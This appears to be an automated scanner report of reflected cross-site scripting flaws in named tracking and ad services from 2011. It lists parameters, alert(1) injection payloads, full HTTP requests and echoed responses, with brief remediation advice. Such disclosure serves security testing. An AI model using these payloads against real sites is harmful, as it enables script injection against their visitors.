Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... ; break; case 'kmc1': val = '1833889000-1'; break; case 'kmc2': val = 'N/A'; break; case 'kmc2': val = 'N/A'; break; case 'kmc3': val = '47eca';alert(1)//e9854004d58'; break; case 'kmc3': val = '47eca';alert(1)//e9854004d58'; break; case 'kmc4': val = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc5': ...[SNIP]...
The value of the lc4 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98ec5'%3balert(1)//49abfb9ed59 was submitted in the lc4 parameter. This input was echoed as 98ec5';alert(1)//49abfb9ed59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=98ec5'%3balert(1)//49abfb9ed59&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... l = 'N/A'; break; case 'kmc2': val = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc4': val = '98ec5';alert(1)//49abfb9ed59'; break; case 'kmc4': val = '98ec5';alert(1)//49abfb9ed59'; break; case 'kmc5': val = 'N/A'; break; case 'kmc5': val = 'N/A'; break; case 'kmrd': ...[SNIP]...
The value of the lc5 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79f9e'%3balert(1)//b16bb549e8 was submitted in the lc5 parameter. This input was echoed as 79f9e';alert(1)//b16bb549e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=79f9e'%3balert(1)//b16bb549e8&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... l = 'N/A'; break; case 'kmc3': val = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc5': val = '79f9e';alert(1)//b16bb549e8'; break; case 'kmc5': val = '79f9e';alert(1)//b16bb549e8'; break; case 'kmrd': val = 'Referrer information not available'; break; case 'newvisit': val = ...[SNIP]...
The value of the lca request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bdc7'%3balert(1)//fcb9531e7e0 was submitted in the lca parameter. This input was echoed as 7bdc7';alert(1)//fcb9531e7e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=7bdc7'%3balert(1)//fcb9531e7e0&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case 'kmas': val = '0'; break; case 'cpca': val = '7bdc7';alert(1)//fcb9531e7e0'; break; case 'kmca': val = '7bdc7';alert(1)//fcb9531e7e0'; break; case 'cpag': val = 'AdGroup not provided'; break; case 'kmag': val = 'AdGroup not pro ...[SNIP]...
The value of the lmt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc72'%3balert(1)//8a144b00b49 was submitted in the lmt parameter. This input was echoed as bcc72';alert(1)//8a144b00b49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=bcc72'%3balert(1)//8a144b00b49&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... dGroup not provided'; break; case 'kw': val = 'Raw Query not available'; break; case 'kmkw': val = 'Raw Query not available'; break; case 'kmmt': val = 'bcc72';alert(1)//8a144b00b49'; break; case 'kmmt': val = 'bcc72';alert(1)//8a144b00b49'; break; case 'kmrq': val = 'Raw Query not available'; break; case 'kmrq': val = 'Raw Query no ...[SNIP]...
The value of the rho request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 947b1'%3balert(1)//261c1b264d4 was submitted in the rho parameter. This input was echoed as 947b1';alert(1)//261c1b264d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=947b1'%3balert(1)//261c1b264d4&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... l = 'N/A'; break; case 'kmc4': val = 'N/A'; break; case 'kmc5': val = 'N/A'; break; case 'kmc5': val = 'N/A'; break; case 'kmrd': val = '947b1';alert(1)//261c1b264d4'; break; case 'newvisit': val = 'true'; break; default: val = 'undefined'; } return val; } var km_Acct = '6633'; var cbd = km_GBD(window.location.hostname); cbd ...[SNIP]...
The value of the rqu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65450'%3balert(1)//dc7176d7fd3 was submitted in the rqu parameter. This input was echoed as 65450';alert(1)//dc7176d7fd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=65450'%3balert(1)//dc7176d7fd3&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function km_GetTrackingURL(param) { var val; switch (param.toLowerCase()) { case 'adsource': val = 'Other Sources'; break; case 'cpao': val = '0'; break; case ...[SNIP]... = 'Campaign not provided'; break; case 'cpag': val = 'AdGroup not provided'; break; case 'kmag': val = 'AdGroup not provided'; break; case 'kw': val = '65450';alert(1)//dc7176d7fd3'; break; case 'kmkw': val = '65450';alert(1)//dc7176d7fd3'; break; case 'kmmt': val = 'unk'; break; case 'kmmt': val = 'unk'; break; case 'kmrq': ...[SNIP]...
The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f006'%3balert(1)//ad02c86a733 was submitted in the vid parameter. This input was echoed as 6f006';alert(1)//ad02c86a733 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KM2.js?x=1&lcc=0&vid=6f006'%3balert(1)//ad02c86a733&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the disp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb907'%3balert(1)//67c803c981b was submitted in the disp parameter. This input was echoed as eb907';alert(1)//67c803c981b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-4999&disp=%23%23%23-%23%23%23-%23%23%23%23eb907'%3balert(1)//67c803c981b&ctype=1&rnd=0.526470772922039&vid=8724330e5e1e4e0c9955f42eddb6ccbb HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d727'-alert(1)-'0a43435fc7f was submitted in the pat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /KMGCnew.js?mod=auto&cat=0&cbk=&tgt=&pat=888-793-49997d727'-alert(1)-'0a43435fc7f&disp=%23%23%23-%23%23%23-%23%23%23%23&ctype=1&rnd=0.526470772922039&vid=8724330e5e1e4e0c9955f42eddb6ccbb HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 18161<script>alert(1)</script>6d519406201 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1317384164098-265536&mboxPage=1317384164098-265536&mboxCount=1&mbox=gc-b-pencil18161<script>alert(1)</script>6d519406201&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 207
Date: Fri, 30 Sep 2011 12:03:42 GMT
Server: Test & Target
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9421b<script>alert(1)</script>90afb1bdcc7 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the prodid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 183de"><script>alert(1)</script>20f5a84f75e was submitted in the prodid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:07:32 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=20-2147483647; expires=Mon, 30 Sep 2013 00:07:32 GMT; path=/; domain=.gsimedia.net
x_transtrans: .6.10.688
Content-Type: text/html
Content-Length: 943
Connection: close
<HTML><BODY>
<!-- Google Code for Product Pages For Test Remarketing List --> <script type="text/javascript"> /* <![CDATA[ */ var google_conversion_id = 1071831421; var google_conversion_language = ...[SNIP]... <img src="http://tlcint.teracent.net/tase/int?adv=441&fmt=redir&sec=0&pid=prod&tpid=1312567322759&prodID=2870764183de"><script>alert(1)</script>20f5a84f75e" width="1" height="1" border="0" alt=""> ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e90b1<script>alert(1)</script>3e0bd49c5f1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ssv_TRT1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 636aa"%3balert(1)//907ac3db01e was submitted in the ssv_TRT1 parameter. This input was echoed as 636aa";alert(1)//907ac3db01e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Homepage636aa";alert(1)//907ac3db01e||||||||||Pending|||OO-00000000000000000;ord=0981108?";
var xp1_i2 = new Image(); xp1_i2.src = "http://d.xp1.ru4.com/activity?_o=15607&_t=appdecl";
var xp1_i3 = new Image(); xp1_i3.src = "htt ...[SNIP]...
The value of the ssv_TRT10 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e9e3"%3balert(1)//90396dee028 was submitted in the ssv_TRT10 parameter. This input was echoed as 6e9e3";alert(1)//90396dee028 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=118 ...[SNIP]... 4817853?";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560|||Belkin+Laptop+Cushtop+Lap+Rest|39.996e9e3";alert(1)//90396dee028|Pending|||OO-00000000000000000;ord=4817853?";
var xp1_i5 = new Image(); xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&ActionID=39&ActionName=RETARGETING_PILOT_2010 ...[SNIP]...
The value of the ssv_TRT11 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fdf7"%3balert(1)//a543fbaa54e was submitted in the ssv_TRT11 parameter. This input was echoed as 1fdf7";alert(1)//a543fbaa54e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Homepage||||||||||Pending1fdf7";alert(1)//a543fbaa54e|||OO-00000000000000000;ord=9274923?";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.yieldmanager.com/pixel?id=126805&t=2";
var xp1_i4 = new Image(); xp1_i4.src = "http://d.xp1.ru4.com/acti ...[SNIP]...
The value of the ssv_TRT5 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbae"%3balert(1)//17c7ffa0f8c was submitted in the ssv_TRT5 parameter. This input was echoed as 4dbae";alert(1)//17c7ffa0f8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128437&t=2";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Category||||39654dbae";alert(1)//17c7ffa0f8c||||||Pending|||OO-00000000000000000;ord=7055920?";
var xp1_i4 = new Image(); xp1_i4.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11881;sz=1x1;ord=7055920?";
The value of the ssv_TRT6 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4d5d"%3balert(1)//ea0e712831d was submitted in the ssv_TRT6 parameter. This input was echoed as d4d5d";alert(1)//ea0e712831d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11882;sz=1x1;ord=4508591?";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560d4d5d";alert(1)//ea0e712831d|||Belkin+Laptop+Cushtop+Lap+Rest|39.99|Pending|||OO-00000000000000000;ord=4508591?";
var xp1_i5 = new Image(); xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&Action ...[SNIP]...
The value of the ssv_TRT9 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23389"%3balert(1)//9f55b97ef3e was submitted in the ssv_TRT9 parameter. This input was echoed as 23389";alert(1)//9f55b97ef3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var xp1_i1 = new Image(); xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";
var xp1_i2 = new Image(); xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=118 ...[SNIP]... 1;ord=4135632?";
var xp1_i3 = new Image(); xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560|||Belkin+Laptop+Cushtop+Lap+Rest23389";alert(1)//9f55b97ef3e|39.99|Pending|||OO-00000000000000000;ord=4135632?";
var xp1_i5 = new Image(); xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&ActionID=39&ActionName=RETARGETING_PILO ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d13c<img%20src%3da%20onerror%3dalert(1)>c049202440 was submitted in the REST URL parameter 4. This input was echoed as 7d13c<img src=a onerror=alert(1)>c049202440 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 58a14<img%20src%3da%20onerror%3dalert(1)>a91f95678f9 was submitted in the id parameter. This input was echoed as 58a14<img src=a onerror=alert(1)>a91f95678f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab7ea<img%20src%3da%20onerror%3dalert(1)>a50c18d4da6 was submitted in the REST URL parameter 4. This input was echoed as ab7ea<img src=a onerror=alert(1)>a50c18d4da6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 96fd6<img%20src%3da%20onerror%3dalert(1)>53234c08386 was submitted in the REST URL parameter 4. This input was echoed as 96fd6<img src=a onerror=alert(1)>53234c08386 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 12c0f<img%20src%3da%20onerror%3dalert(1)>26393e8caae was submitted in the REST URL parameter 4. This input was echoed as 12c0f<img src=a onerror=alert(1)>26393e8caae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82100<img%20src%3da%20onerror%3dalert(1)>7f0eeab06c9 was submitted in the REST URL parameter 4. This input was echoed as 82100<img src=a onerror=alert(1)>7f0eeab06c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bd65<img%20src%3da%20onerror%3dalert(1)>a4ac2cb2f1f was submitted in the REST URL parameter 4. This input was echoed as 3bd65<img src=a onerror=alert(1)>a4ac2cb2f1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32bcd<img%20src%3da%20onerror%3dalert(1)>50d44c30387 was submitted in the REST URL parameter 4. This input was echoed as 32bcd<img src=a onerror=alert(1)>50d44c30387 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 656aa<img%20src%3da%20onerror%3dalert(1)>cb60ea3b9ca was submitted in the REST URL parameter 4. This input was echoed as 656aa<img src=a onerror=alert(1)>cb60ea3b9ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9bc98<img%20src%3da%20onerror%3dalert(1)>524eba17d44 was submitted in the REST URL parameter 4. This input was echoed as 9bc98<img src=a onerror=alert(1)>524eba17d44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78a16<img%20src%3da%20onerror%3dalert(1)>a975e107cec was submitted in the REST URL parameter 4. This input was echoed as 78a16<img src=a onerror=alert(1)>a975e107cec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3cf<img%20src%3da%20onerror%3dalert(1)>1c211ad9899 was submitted in the REST URL parameter 4. This input was echoed as ca3cf<img src=a onerror=alert(1)>1c211ad9899 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 219b5<img%20src%3da%20onerror%3dalert(1)>2106a010781 was submitted in the REST URL parameter 4. This input was echoed as 219b5<img src=a onerror=alert(1)>2106a010781 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 66bc0<img%20src%3da%20onerror%3dalert(1)>988cc3be2c5 was submitted in the REST URL parameter 4. This input was echoed as 66bc0<img src=a onerror=alert(1)>988cc3be2c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
